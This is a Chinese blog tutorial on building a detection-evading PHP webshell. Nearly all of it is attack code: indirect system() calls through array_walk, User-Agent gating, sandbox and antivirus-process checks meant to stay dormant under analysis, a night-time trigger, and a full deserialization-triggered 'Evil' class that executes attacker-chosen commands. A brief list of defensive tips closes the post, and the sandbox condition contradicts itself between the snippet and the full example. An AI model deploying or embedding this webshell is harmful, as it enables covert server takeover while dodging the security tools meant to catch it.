多条件触发的免杀Webshell技术详解<\/h1>

前言<\/h2>
本文详细解析了一种基于多条件触发的PHP Webshell免杀技术，通过将变量作为函数使用并结合环境检测机制，可以有效绕过传统安全检测。该技术借鉴了shellcode免杀和云沙箱绕过的思路，通过设置多个运行条件，使Webshell只在特定环境下执行。<\/p>

核心技术：array_walk回调函数<\/h2>

array_walk函数基础<\/h3>
array_walk<\/code>是PHP内置函数，用于对数组每个元素应用用户自定义回调函数：<\/p>
bool<\/span> array_walk<\/span> ( array<\/span> &<\/span>$array , callable<\/span> $callback [, mixed<\/span> $userdata =<\/span> NULL<\/span> ] )
<\/span><\/span><\/code><\/pre>
$array<\/strong>: 要遍历的数组（按引用传递，可直接修改）<\/li>
**\(callback**: 用户自定义回调函数，接收两个参数（值，键）或三个参数（值，键，\)<\/span>userdata）<\/li>
$userdata<\/strong>（可选）: 传递给回调函数的额外数据<\/li>
返回值<\/strong>: 成功返回true，失败返回false<\/li>
<\/ul>
示例代码<\/h3>
$array =<\/span> array<\/span>("a"<\/span> =><\/span> "A"<\/span>, "b"<\/span> =><\/span> "B"<\/span>, "c"<\/span> =><\/span> "C"<\/span>);
<\/span><\/span>$func =<\/span> "strtolower"<\/span>;
<\/span><\/span>array_walk<\/span>($array, $func);
<\/span><\/span>print_r<\/span>($array);
<\/span><\/span><\/code><\/pre>输出：<\/p>
Array
(
    [a] => a
    [b] => b
    [c] => c
)
<\/code><\/pre>
免杀应用<\/h3>
通过将命令执行函数（如system<\/code>）赋值给变量，然后使用array_walk<\/code>调用，可以绕过对直接函数调用的检测：<\/p>
$array =<\/span> array<\/span>("whoami"<\/span>);
<\/span><\/span>$func =<\/span> "system"<\/span>;
<\/span><\/span>array_walk<\/span>($array, $func);
<\/span><\/span><\/code><\/pre>多条件触发机制<\/h2>
1. 浏览器检测<\/h3>
只在特定浏览器访问时运行，通过检测User-Agent实现：<\/p>
if<\/span>(strpos<\/span>($_SERVER['HTTP_USER_AGENT'<\/span>], 'Chrome'<\/span>) !==<\/span> false<\/span> ||<\/span> 
<\/span><\/span>   strpos<\/span>($_SERVER['HTTP_USER_AGENT'<\/span>], 'Firefox'<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>    \/\/ 执行恶意代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>常见User-Agent示例：<\/p>

Google Chrome: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36<\/code><\/li>
Mozilla Firefox: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/119.0<\/code><\/li>
<\/ul>
2. 云沙箱环境检测<\/h3>
检测到沙箱环境时不运行：<\/p>
\/\/ 检测文件或目录是否存在
<\/span><\/span><\/span><\/span>if<\/span>(!<\/span>file_exists<\/span>('\/etc\/hostname'<\/span>) ||<\/span> file_exists<\/span>('\/home\/sandbox'<\/span>)) {
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 检测特定函数是否被禁用
<\/span><\/span><\/span><\/span>if<\/span>(!<\/span>function_exists<\/span>('exec'<\/span>) ||<\/span> !<\/span>function_exists<\/span>('system'<\/span>)) {
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 检测特定扩展是否加载
<\/span><\/span><\/span><\/span>if<\/span>(extension_loaded<\/span>('suhosin'<\/span>) ||<\/span> extension_loaded<\/span>('runkit'<\/span>)) {
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 杀毒软件检测<\/h3>
检测到杀毒软件进程时不运行：<\/p>
\/\/ Windows系统检测
<\/span><\/span><\/span><\/span>if<\/span>(strtoupper<\/span>(substr<\/span>(PHP_OS<\/span>, 0<\/span>, 3<\/span>)) ===<\/span> 'WIN'<\/span>) {
<\/span><\/span>    exec<\/span>('tasklist'<\/span>, $output);
<\/span><\/span>    $avProcesses =<\/span> ['avp.exe'<\/span>, 'bdagent.exe'<\/span>, 'mbam.exe'<\/span>]; \/\/ 常见杀软进程
<\/span><\/span><\/span><\/span>    foreach<\/span>($avProcesses as<\/span> $av) {
<\/span><\/span>        if<\/span>(strpos<\/span>(implode<\/span>("<\/span>\n<\/span>"<\/span>, $output), $av) !==<\/span> false<\/span>) {
<\/span><\/span>            exit<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>\/\/ Linux系统检测
<\/span><\/span><\/span><\/span>else<\/span> {
<\/span><\/span>    exec<\/span>('ps aux'<\/span>, $output);
<\/span><\/span>    $avProcesses =<\/span> ['clamav'<\/span>, 'rkhunter'<\/span>, 'chkrootkit'<\/span>];
<\/span><\/span>    foreach<\/span>($avProcesses as<\/span> $av) {
<\/span><\/span>        if<\/span>(strpos<\/span>(implode<\/span>("<\/span>\n<\/span>"<\/span>, $output), $av) !==<\/span> false<\/span>) {
<\/span><\/span>            exit<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 时间条件控制<\/h3>
只在特定时间段运行（如非工作时间）：<\/p>
$hour =<\/span> date<\/span>('H'<\/span>);
<\/span><\/span>if<\/span>($hour >=<\/span> 22<\/span> ||<\/span> $hour <=<\/span> 6<\/span>) { \/\/ 22:00到6:00之间
<\/span><\/span><\/span><\/span>    \/\/ 执行恶意代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整示例代码<\/h2>
结合HGCTF反序列化的免杀马：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Evil<\/span> {
<\/span><\/span>    public<\/span> $func;
<\/span><\/span>    public<\/span> $args;
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> __destruct() {
<\/span><\/span>        \/\/ 多条件检测
<\/span><\/span><\/span><\/span>        $conditions =<\/span> true<\/span>;
<\/span><\/span>        
<\/span><\/span>        \/\/ 1. 浏览器检测
<\/span><\/span><\/span><\/span>        $conditions &=<\/span> (strpos<\/span>($_SERVER['HTTP_USER_AGENT'<\/span>], 'Chrome'<\/span>) !==<\/span> false<\/span> ||<\/span> 
<\/span><\/span>                       strpos<\/span>($_SERVER['HTTP_USER_AGENT'<\/span>], 'Firefox'<\/span>) !==<\/span> false<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 沙箱检测
<\/span><\/span><\/span><\/span>        $conditions &=<\/span> !<\/span>file_exists<\/span>('\/etc\/hostname'<\/span>) &&<\/span> !<\/span>file_exists<\/span>('\/home\/sandbox'<\/span>);
<\/span><\/span>        $conditions &=<\/span> function_exists<\/span>('exec'<\/span>) &&<\/span> function_exists<\/span>('system'<\/span>);
<\/span><\/span>        $conditions &=<\/span> !<\/span>extension_loaded<\/span>('suhosin'<\/span>) &&<\/span> !<\/span>extension_loaded<\/span>('runkit'<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 杀毒软件检测
<\/span><\/span><\/span><\/span>        if<\/span>(strtoupper<\/span>(substr<\/span>(PHP_OS<\/span>, 0<\/span>, 3<\/span>)) ===<\/span> 'WIN'<\/span>) {
<\/span><\/span>            exec<\/span>('tasklist'<\/span>, $output);
<\/span><\/span>            $avProcesses =<\/span> ['avp.exe'<\/span>, 'bdagent.exe'<\/span>, 'mbam.exe'<\/span>];
<\/span><\/span>            foreach<\/span>($avProcesses as<\/span> $av) {
<\/span><\/span>                if<\/span>(strpos<\/span>(implode<\/span>("<\/span>\n<\/span>"<\/span>, $output), $av) !==<\/span> false<\/span>) {
<\/span><\/span>                    $conditions =<\/span> false<\/span>;
<\/span><\/span>                    break<\/span>;
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            exec<\/span>('ps aux'<\/span>, $output);
<\/span><\/span>            $avProcesses =<\/span> ['clamav'<\/span>, 'rkhunter'<\/span>, 'chkrootkit'<\/span>];
<\/span><\/span>            foreach<\/span>($avProcesses as<\/span> $av) {
<\/span><\/span>                if<\/span>(strpos<\/span>(implode<\/span>("<\/span>\n<\/span>"<\/span>, $output), $av) !==<\/span> false<\/span>) {
<\/span><\/span>                    $conditions =<\/span> false<\/span>;
<\/span><\/span>                    break<\/span>;
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 时间检测
<\/span><\/span><\/span><\/span>        $hour =<\/span> date<\/span>('H'<\/span>);
<\/span><\/span>        $conditions &=<\/span> ($hour >=<\/span> 22<\/span> ||<\/span> $hour <=<\/span> 6<\/span>);
<\/span><\/span>        
<\/span><\/span>        \/\/ 满足所有条件才执行
<\/span><\/span><\/span><\/span>        if<\/span>($conditions) {
<\/span><\/span>            array_walk<\/span>(array<\/span>($this-><\/span>args<\/span>), $this-><\/span>func<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 使用示例
<\/span><\/span><\/span><\/span>$evil =<\/span> new<\/span> Evil<\/span>();
<\/span><\/span>$evil-><\/span>func<\/span> =<\/span> "system"<\/span>;
<\/span><\/span>$evil-><\/span>args<\/span> =<\/span> "whoami"<\/span>;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>防御建议<\/h2>

禁用危险函数<\/strong>：在php.ini中禁用system<\/code>、exec<\/code>、shell_exec<\/code>等危险函数<\/li>
严格过滤输入<\/strong>：对所有用户输入进行严格过滤和验证<\/li>
监控异常行为<\/strong>：监控服务器上的异常进程和网络连接<\/li>
定期更新规则<\/strong>：保持WAF和杀毒软件的规则库最新<\/li>
限制文件上传<\/strong>：严格控制文件上传功能，限制可上传文件类型<\/li>
代码审计<\/strong>：定期进行代码审计，特别是用户可控输入的处理部分<\/li>
<\/ol>
通过理解这些免杀技术，安全人员可以更好地防御此类攻击，而开发者也应避免在代码中留下可能被利用的漏洞。<\/p>